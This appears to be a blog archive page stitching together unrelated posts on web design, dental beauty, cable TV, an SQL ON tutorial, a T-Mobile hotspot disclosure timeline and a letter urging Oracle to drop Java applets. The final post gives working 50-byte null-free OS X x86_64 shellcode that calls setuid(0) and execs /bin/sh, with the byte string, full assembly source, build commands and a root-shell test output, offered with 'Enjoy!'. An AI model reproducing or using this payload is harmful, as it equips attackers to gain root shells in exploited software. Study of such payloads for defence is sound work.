Choosing a Good Web Design Team for Your Business

I remember building my first website as a young man. It was fun to spend all those hours learning how to do it. My main motivation was to show off for friends and family. I built a bunch of websites that were very basic, but they looked like masterpieces to people who knew nothing about the Internet or websites. I am very embarrassed about my efforts. I never went anywhere with it even though I considered I might make it a career back then. The company I own as an adult uses a firm that does website design in Michigan. I could not even begin to build anything now. I barely even remember a couple of basic HTML tags.web-design-development-concept-xs

The point I am making is that we should leave some things to professionals. We should consult with people that have a proven track record of performance. I remember the early days of the Internet where small business owners were allowing employees or relatives with some web experience to build them an online presence. That never was a good idea. (more…)

Server Management for New Business Website

It has taken a lot of work and dedication from a couple of my employees, but the new website for our company is finally ready to be launched. It is a day that I have looked forward to, because this has been a long time in the making and I have worried that it would not turn out as intended. We need to hire server management for the new website though, because I do not want my employees to have to worry about keeping the website running. They have other things to attend to, and I feel like too much of their time has already been devoted to this project, to expect them to put more time into it going forward.server-management2

The real vision of the new website was what took so much effort to develop. (more…)

My Wife Figured out What Would Help

Hitachi wand massagerI had tried a couple of things try to fix the trouble I was having with my neck and back. I was at my wit’s end. I was not really sure what else to do. My wife said that I should try a Hitachi wand massager to see if that would do anything for me. I had not though about that previously, but was not really sure it would do me any good. I told her I would try it if things grew worse.

I first went to my doctor when I began having pain. The pain had been going on for at least three weeks. I even spent about three of those days in bed near the end of those three weeks. I could barely move because I hurt so much. I knew that I could not take any time off of work, so quickly made the doctor’s appointment. My doctor said that I probably strained my back at work because I do heavy lifting. (more…)

Are Perfect Teeth Necessary for Beauty

Dental work is a nightmare for most people but the United States remains one of the most dental oriented societies in the world. There’s a very real social pressure to have the best and brightest white teeth regardless of where you may live in America. The idea of having perfect teeth saturates our culture and is one of the driving points of attractiveness; if not the one defining feature that seems to be shared in the multiple interpretations of what we believe beauty to be as Americans. Have you visited your dentist in Grand Rapids? If not, I bet you feel guilty right now for doing so after being so shamelessly reminded that the beauty equation ends and begins with your teeth. It’s something that I’ve struggled with for years because I don’t have straight teeth. There’s very few women who are going to find it endearing and only a handful of women I have dated have thought that it was an attractive part of my features.

There’s nothing at all wrong with having great teeth. (more…)

Thinking About Dumping My Cable Tv

Cable TV guideThinking about dumping my cable tv, but I am not sure what would be the best thing to do instead. Of course I watch a lot of live sports and that is the thing that really keeps people from cutting the cable on Time Warner and Comcast and those other pirates. Everything else you can get off the internet of you can get you a Digital Video Recorder like the Direct TV Genie and record it, then you play it back and skip through the ads. Obviously that sort of defeats the whole purpose of most tv programs. (more…)

SQL ON

The SQL ON clause is used to create JOIN queries  when information are located in different tables, i.e. allows to join related data tables by specifying a condition that involves a key field that identifies both tables, the key field contains data that is found in the first table and  in the second table, and therefore both tables are related by this key field. Is optional you have these fields defined as a FOREIGN KEY between two tables, what is essential is that there are two fields that have the data to identify the records from both tables.

Following is the general syntax to use the SQL ON clause for  two tables, using the JOIN query:

SELECT fieldNamess FROM table_1 AS one

     JOIN table_2 AS two

     ON one.field = two.field

 

When the type of JOIN (INNER, LEFT, RIGHT) is not specified the default JOIN is INNER JOIN, which returns a record when it meets the condition of the JOIN specified in the operator ON.

In the following example we are using the AdventureWorks database, to get the name of the territory for the customers. The required information is contained in the tables, Sales.Customer and Sales.SalesTerritory, the field that will serve as a JOIN condition is TerritoryID, which will be used in the SQL ON operator. This field will allow us to relate data from both tables. In the table definition, Sales.Customer has a FOREIGN KEY with theSales.SalesTerritory table.

In the result query we will get the ID and customer type as well as the account number  from the Sales.Customer table and the name of the territory from the Sales.SalesTerritory table. The JOIN syntax is as follows:

SELECT  C.CustomerID , C.CustomerType ,C.AccountNumber ,T.Name    FROM Sales .SalesTerritory AS T

INNER JOIN Sales .Customer AS C

ON T.TerritoryID = C.TerritoryID

As we see the INNER JOIN operator is used to mention the second table where we will find the additional information, later in the JOIN condition we use the  SQL ON operator, placing the field that will allow us to join the information from the two tables. In the image we can see the output of the query:

{ 0 comments }

T-Mobile 4G Hotspot Multiple Vulnerabilities

About

Create your own personal hotspot on the go with the T-Mobile 4G Mobile Hotspot—get high-speed Internet on up to five Wi-Fi devices, using a single mobile broadband connection.

Link to Product on T-Mobile’s Website

Timeline

  • Reported to T-Mobile and ZTE on 4/14/12.
  • Received notification from T-Mobile on 4/17/12 that the vulnerabilities would be forwarded to their security team for review.
  • Received no meaningful response from ZTE.
  • No fixes provided, disclosure 2/21/13

Device: T-Mobile 4G Mobile Hotspot ZTE MF61

The access point broadcasts as ‘T-Mobile Broadband#’ where # changes per device.

(more…)

My Plea to Oracle: Axe Java Applets

Hi Oracle,

We’ve got a bit of problem: applets.

You see, almost every recent security vulnerability and recent hack – Facebook, Apple, NYT – has been because of your support for applets.

Just to name a few, there’s CVE-2012-3213,CVE-2012-3342,CVE-2013-0351,CVE-2013-0409,CVE-2013-0419,CVE-2013-0423,CVE-2013-0424,CVE-2013-0425,CVE-2013-0426,CVE-2013-0427,CVE-2013-0428,CVE-2013-0429,CVE-2013-0432,CVE-2013-043,CVE-2013-0434,CVE-2013-0435,CVE-2013-0438,CVE-2013-0440,CVE-2013-0441,CVE-2013-0442,CVE-2013-0443,CVE-2013-0445,CVE-2013-0450,CVE-2013-1473,CVE-2013-1475,CVE-2013-1476,CVE-2013-1478,CVE-2013-1480,CVE-2013-1481,CVE-2013-1486,CVE-2013-1487,CVE-2013-1488.

I’ve been developing in Java for many years and I can attest that nobody uses applets anymore. It’s old outdated technology that needs to go away. It’s too heavy of a platform to deliver web applications. The future of web technology is light weight. The future is HTML5, Javascript, and CSS3.

We all make mistakes and nobody is going to blame you (except maybe the malware authors) for getting rid of applets.

Do it! Axe it!

Sincerely,
Security Enthusiast and Java Developer
Dustin Schultz

Java Facepalm

It’s been a while since I’ve blogged but I couldn’t resist with the latest Java vulnerability. I saw the proof of concept code posted by jduck last night (here) and thought this looks like normal Java code to me (I develop in Java at my day job). Well it turns out…this is normal Java code!

(more…)

50 Byte x86_64 OS X setuid execve Null Free Shellcode

More smaller shellcode, this time, tested and verified working on OSX 10.7.

Shellcode

/*
 * Name: setuid_shell_x86_64
 * Qualities: Null-Free
 * Platforms: Mac OS X 10.7 Intel x86_64
 *
 *  Created on: Apr 12, 2012
 *      Author: Dustin Schultz - TheXploit.com
 */
char shellcode[] =
"\x41\xb0\x02\x49\xc1\xe0\x18\x49\x83\xc8\x17\x31\xff\x4c\x89\xc0"
"\x0f\x05\x49\x83\xc0\x24\x4c\x89\xc0\x48\x31\xd2\x48\xbf\x2f\x62"
"\x69\x6e\x2f\x2f\x73\x68\x52\x57\x48\x89\xe7\x52\x57\x48\x89\xe6"
"\x0f\x05";

Source

; File: setuid_shell_x86_64.asm
; Author: Dustin Schultz - TheXploit.com
BITS 64

section .text
global start

start:
mov r8b, 0x02                   ; Unix class system calls = 2
shl r8, 24                      ; shift left 24 to the upper order bits
or r8, 0x17                     ; setuid = 23, or with class = 0x2000017
xor edi, edi                    ; zero out edi, uid = 0
mov rax, r8                     ; syscall number in rax
; mov rax, 0x2000017
syscall                         ; invoke kernel
add r8, 0x24                    ; 0x24+r8=0x200003b
mov rax, r8                     ; syscall number in rax
xor rdx, rdx                    ; zero out rdx, null terminator
; mov rax, 0x200003b
mov rdi, 0x68732f2f6e69622f     ; /bin//sh in hex
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rdi, rsp                    ; null terminated /bin/sh pointer
push rdx                        ; push backwards, null terminator
push rdi                        ; address of /bin//sh
mov rsi, rsp                    ; null terminated /bin/sh pointer
syscall                         ; invoke kernel

To test:

dustin@sholtz:~/$ nasm -f macho64 shell.s 
dustin@sholtz:~/$ ld -static -arch x86_64 shell.o
dustin@sholtz:~/$ ./a.out
bash-3.2# 

Bytes from otool:

dustin@sholtz:~/$ otool -t a.out 
a.out:
(__TEXT,__text) section
0000000100000f86 41 b0 02 49 c1 e0 18 49 83 c8 17 31 ff 4c 89 c0 
0000000100000f96 0f 05 49 83 c0 24 4c 89 c0 48 31 d2 48 bf 2f 62 
0000000100000fa6 69 6e 2f 2f 73 68 52 57 48 89 e7 52 57 48 89 e6 
0000000100000fb6 0f 05 

Enjoy!

Go to Top